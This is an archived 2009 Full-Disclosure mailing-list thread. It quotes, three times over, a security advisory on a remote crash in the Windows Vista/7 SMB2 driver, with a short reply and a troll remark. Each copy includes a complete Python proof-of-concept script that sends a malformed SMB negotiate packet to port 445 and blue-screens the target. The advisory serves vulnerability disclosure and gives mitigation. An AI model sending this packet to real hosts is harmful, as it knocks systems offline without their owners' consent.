>> II. BACKGROUND
>> - -
>> Windows vista and newer Windows comes with a new SMB version named
>> SMB2.
>> See:
>> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
>> erver_Message_Block_2.0
>> for more details.
>>
>> III. DESCRIPTION
>> - -
>> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> PROTOCOL REQUEST functionnality.
>> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
>> to a SMB server, and it's used
>> to identify the SMB dialect that will be used for futher
>> communication.
>>
>> IV. PROOF OF CONCEPT
>> - -
>>
>> Smb-Bsod.py:
>>
>> #!/usr/bin/python
>> # When SMB2.0 recieve a "&" char in the "Process Id High" SMB
>> header field it dies with a
>> # PAGE_FAULT_IN_NONPAGED_AREA
>>
>> from socket import socket
>> from time import sleep
>>
>> host = "IP_ADDR", 445
>> buff = (
>> "\x00\x00\x00\x90" # Begin SMB header: Session message
>> "\xff\x53\x4d\x42" # Server Component: SMB
>> "\x72\x00\x00\x00" # Negociate Protocol
>> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
>> "\x00\x26"# Process ID High: --> :) normal value should be
>> "\x00\x00"
>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
>> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
>> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
>> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
>> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
>> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
>> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
>> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
>> "\x30\x30\x32\x00"
>> )
>> s = socket()
>> s.connect(host)
>> s.send(buff)
>> s.close()
>>
>> V. BUSINESS IMPACT
>> - -
>> An attacker can remotly crash without no user interaction, any
>> Vista/Windows 7 machine with SMB enable.
>> Windows Xp, 2k, are NOT affected as they dont have this driver.
>>
>> VI. SYSTEMS AFFECTED
>> - -
>> Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
>> Win Server 2008
>> as it use the same SMB2.0 driver (not tested).
>>
>> VII. SOLUTION
>> - -
>> Vendor contacted, but no patch available for the moment.
>> Close SMB feature and ports, until a patch is provided.
>>
>> VIII. REFERENCES
>> - -
>> http://microsoft.com
>>
>> IX. CREDITS
>> - -
>> This vulnerability has been discovered by Laurent Gaffié
>> Laurent.gaffie{remove-this}(at)gmail.com
>> http://g-laurent.blogspot.com/
>>
>> X. LEGAL NOTICES
>> - -
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Note: This signature can be verified at https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>> wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
>> mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
>> pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
>> 6kWcu5Q=
>> =MjSD
>> -END PGP SIGNATURE-
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
> --
> http://www.jewelerslounge.com
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-09 Thread James Matthews
So Msoft! why can't they just stop reintroducing bugs?

On Wed, Sep 9, 2009 at 11:04 AM,  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> How come all I hear about is n3td3v, and I see noone crying out
> lout about this :
> http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta
> sk=show&action=view&id=64&Itemid=15
>
> is fd all 'bout trolls nao?
>
> - --
> =
> - - Release date: September 7th, 2009
> - - Discovered by: Laurent Gaffié
> - - Severity: Medium/High
> =
>
> I. VULNERABILITY
> - -
> Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>
> II. BACKGROUND
> - -
> Windows vista and newer Windows comes with a new SMB version named
> SMB2.
> See:
> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
> erver_Message_Block_2.0
> for more details.
>
> III. DESCRIPTION
> - -
> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
> PROTOCOL REQUEST functionnality.
> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
> to a SMB server, and it's used
> to identify the SMB dialect that will be used for futher
> communication.
>
> IV. PROOF OF CONCEPT
> - -
>
> Smb-Bsod.py:
>
> #!/usr/bin/python
> # When SMB2.0 recieve a "&" char in the "Process Id High" SMB
> header field it dies with a
> # PAGE_FAULT_IN_NONPAGED_AREA
>
> from socket import socket
> from time import sleep
>
> host = "IP_ADDR", 445
> buff = (
> "\x00\x00\x00\x90" # Begin SMB header: Session message
> "\xff\x53\x4d\x42" # Server Component: SMB
> "\x72\x00\x00\x00" # Negociate Protocol
> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
> "\x00\x26"# Process ID High: --> :) normal value should be
> "\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
> "\x30\x30\x32\x00"
> )
> s = socket()
> s.connect(host)
> s.send(buff)
> s.close()
>
> V. BUSINESS IMPACT
> - -
> An attacker can remotly crash without no user interaction, any
> Vista/Windows 7 machine with SMB enable.
> Windows Xp, 2k, are NOT affected as they dont have this driver.
>
> VI. SYSTEMS AFFECTED
> - -
> Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
> Win Server 2008
> as it use the same SMB2.0 driver (not tested).
>
> VII. SOLUTION
> - -
> Vendor contacted, but no patch available for the moment.
> Close SMB feature and ports, until a patch is provided.
>
> VIII. REFERENCES
> - -
> http://microsoft.com
>
> IX. CREDITS
> - -
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com
> http://g-laurent.blogspot.com/
>
> X. LEGAL NOTICES
> - -
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> -BEGIN PGP SIGNATURE-
> Charset: UTF8
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 3.0
>
> wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
> mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
> pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
> 6kWcu5Q=
> =MjSD
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/




-- 
http://www.jewelerslounge.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-09 Thread randomguy
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

How come all I hear about is n3td3v, and I see noone crying out
lout about this :
http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta
sk=show&action=view&id=64&Itemid=15

is fd all 'bout trolls nao?

- --
=
- - Release date: September 7th, 2009
- - Discovered by: Laurent Gaffié
- - Severity: Medium/High
=

I. VULNERABILITY
- -
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
- -
Windows vista and newer Windows comes with a new SMB version named
SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
erver_Message_Block_2.0
for more details.

III. DESCRIPTION
- -
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
to a SMB server, and it's used
to identify the SMB dialect that will be used for futher
communication.

IV. PROOF OF CONCEPT
- -

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB
header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be
"\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
- -
An attacker can remotly crash without no user interaction, any
Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
- -
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
Win Server 2008
as it use the same SMB2.0 driver (not tested).

VII. SOLUTION
- -
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.

VIII. REFERENCES
- -
http://microsoft.com

IX. CREDITS
- -
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES
- -
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
6kWcu5Q=
=MjSD
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-07 Thread laurent gaffie
=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=

I. VULNERABILITY
-
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-
Windows vista and newer Windows comes with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL
REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB
server, and it's used
to identify the SMB dialect that will be used for futher communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-
An attacker can remotly crash without no user interaction, any Vista/Windows
7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server
2008
as it use the same SMB2.0 driver (not tested).

VII. SOLUTION
-
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.

VIII. REFERENCES
-
http://microsoft.com

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/